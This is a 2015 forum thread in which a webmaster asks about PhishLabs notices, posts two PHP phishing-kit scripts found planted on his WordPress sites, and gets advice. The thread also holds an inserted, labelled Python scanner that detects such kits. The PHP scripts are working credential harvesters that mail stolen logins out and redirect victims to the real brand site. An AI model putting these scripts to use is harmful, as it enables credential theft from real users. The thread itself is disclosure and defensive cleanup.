GoFuckYourself.com - Adult Webmaster Forum

Phishlabs? Who are they? (https://gfy.com/showthread.php?t=1172666)

hausarzt 08-24-2015 01:49 AM

Phishlabs? Who are they?
 
I have received strange emails in the past for almost every one of my sites:

Quote:

Our company investigates computer crime incidents on behalf of banks and other companies.

We have discovered that your web site, hottiescam.com, has been attacked by criminals. These criminals created a fake web page which appears to copy a Spark Networks site.


http:// my website .com/services/mchsvjbsuvkjn.html



If possible, please provide the following information to assist our investigation:

- Web server and FTP server log files for the past several days
- Copies of all phishing files, hack tools, or other hacker files

Finally, we kindly request that you disable or remove the phishing files as soon as possible.

We recommend taking the following actions to secure the web site and prevent the attackers from returning:

- Change your web hosting password
- Update your web applications including CMS, blog, ecommerce, and other applications (and all add-on modules/components/plugins)
- Search all of your web directories for suspicious files and investigate any found
- Scan the computer from which you login to your web hosting control panel or ftp server with anti-virus software

If you believe we have contacted you in error, or if we can provide any assistance with this incident, please contact us and let us know.

Thank you for your assistance with this matter,

Eric George
PhishLabs Security Operations
[email protected]
+1.202.386.6001
http://www.phishlabs.com


Another one through my abuse contact from my hosting:

Quote:

Our company investigates computer crime incidents on behalf of banks and other companies.

We have discovered that your web site, www.dirtycamsluts.com, has been attacked by criminals. These criminals created a fake web page which appears to copy a Spark Networks site.


hXXp www [dot] MY WEBSITE [dot] com/jimjim/mchsvjbsuvkjn [dot] html
hXXp www [dot] MY WEBSITE [dot] com/jimjim/login [dot] php



If possible, please provide the following information to assist our investigation:

- Web server and FTP server log files for the past several days
- Copies of all phishing files, hack tools, or other hacker files

Finally, we kindly request that you disable or remove the phishing files as soon as possible.

We recommend taking the following actions to secure the web site and prevent the attackers from returning:

- Change your web hosting password
- Update your web applications including CMS, blog, ecommerce, and other applications (and all add-on modules/components/plugins)
- Search all of your web directories for suspicious files and investigate any found
- Scan the computer from which you login to your web hosting control panel or ftp server with anti-virus software

If you believe we have contacted you in error, or if we can provide any assistance with this incident, please contact us and let us know.

Thank you for your assistance with this matter,

Matt Twitty
PhishLabs Security Operations
[email protected]
+1.202.386.6001
http://www.phishlabs.com

Sites are running on WordPress. I just checked the sites and found some strange folders in some installs, so I deleted them. Does anyone else have this "problem"?

j3rkules 08-24-2015 01:56 AM

Never heard of them.

hausarzt 08-24-2015 03:18 AM

Alright, now Google Webmaster Tools told me that my sites are reported as phishing sites.

I removed all suspicious files/folders from my sites.


A file called buff.php contained this:

http://pastebin.com/jJ3QS7UH
:warning READ AT YOUR OWN RISK :warning

My Avast goes wild on this file. Can anyone read/translate this?

Some fake-login PHP files:

Quote:

<?php
$ip = getenv("REMOTE_ADDR");
$data=date("D M d, Y g:i a");
$message .= "User: ".$_POST['loginemail']."\n";
$message .= "PassWord: " .$_POST['password']."\n";
$message .= "Country: $ip\n";
$message .= "Date: $data\n";

$recipient = "[email protected]";
$subject = "Christian Mingle | $ip";
$headers = "From: Rashyd Bohaty <[email protected]>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);

header("Location: http://www.christianmingle.com/");
?>

Quote:

<?php
$ip = getenv("REMOTE_ADDR");

$data=date("D M d, Y g:i a");
$message .= "====== Hacked By OBO ======\n";
$message .= "User: ".$_POST['username']."\n";
$message .= "PassWord: " .$_POST['passwd']."\n";
$message .= "Country: $ip\n";
$message .= "Date: $data\n";
$message .= "====== ® Trademark 2015 ======\n";

$recipient = "[email protected]";
$recipient2 = "[email protected]";
$subject = "Y!Logs $ip";
$headers = "From: Rashyd Bohaty <[email protected]>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);
mail($recipient2,$subject,$message,$headers);
header("Location: http://www.yahoomail.com");

?>
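
Added here as a defender's example, not code from the thread, from hausarzt or from PhishLabs: a small Python sweep that implements the "search all of your web directories for suspicious files" step from the PhishLabs notices above, keyed to the traits of the credential-mailing scripts posted in this reply (a password read from $_POST, a mail() call, a Location redirect to the real brand site). The sample web root, its two files and the recipient placeholder are constructed for the demo.

```python
import re
import tempfile
from pathlib import Path

# Traits of the credential-harvesting scripts quoted in this thread: read a
# password field from $_POST, hand it to mail(), then bounce the victim to the
# genuine brand site with a Location header so nothing looks wrong.
TRAITS = [
    ("reads a password field from $_POST",
     re.compile(r"\$_POST\[\s*['\"](?:pass(?:word|wd)?|pwd)['\"]\s*\]", re.I)),
    ("calls mail()", re.compile(r"\bmail\s*\(", re.I)),
    ("redirects to an external URL",
     re.compile(r"header\s*\(\s*['\"]Location:\s*https?://", re.I)),
]

def score_php(source: str) -> list:
    """Name the kit traits present in one PHP source string."""
    return [name for name, rx in TRAITS if rx.search(source)]

def is_suspicious(source: str) -> bool:
    # A posted password that gets mailed out is the core of the kit; the
    # redirect only confirms it. A contact form mails but reads no password.
    hits = score_php(source)
    return TRAITS[0][0] in hits and TRAITS[1][0] in hits

def scan_tree(root: str) -> dict:
    """Walk a web root and report PHP files that mail a posted password."""
    base = Path(root)
    findings = {}
    for path in base.rglob("*.php"):
        try:
            source = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip it rather than abort the sweep
        if is_suspicious(source):
            findings[path.relative_to(base).as_posix()] = score_php(source)
    return findings

# Constructed sample web root (not taken from the thread): a kit-style
# jimjim/login.php next to an ordinary contact form that also calls mail().
KIT = ('<?php $m = "User: ".$_POST["username"]."\\n";'
       '$m .= "PassWord: ".$_POST["passwd"]."\\n";'
       'mail("[RECIPIENT PLACEHOLDER]", "logs", $m);'
       'header("Location: http://www.example.com/"); ?>')
FORM = '<?php mail("[RECIPIENT PLACEHOLDER]", "contact", $_POST["email"]); ?>'

def build_demo_tree() -> str:
    root = Path(tempfile.mkdtemp())
    (root / "jimjim").mkdir()
    (root / "jimjim" / "login.php").write_text(KIT)
    (root / "contact.php").write_text(FORM)
    return str(root)
```

Point scan_tree at a real WordPress document root to list files worth a closer look; the password-field names cover the ones used by the kits in this thread and can be extended for other brands.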

MrGusMuller 08-24-2015 04:35 AM

It was sending the user/password to the hackers' email :/
Change them all!!

MrGusMuller 08-24-2015 04:38 AM

Try Sucuri Security? WAF, DDoS Protection, Malware Removal, WordPress Security, and Blacklist Removal
They have helped some friends...

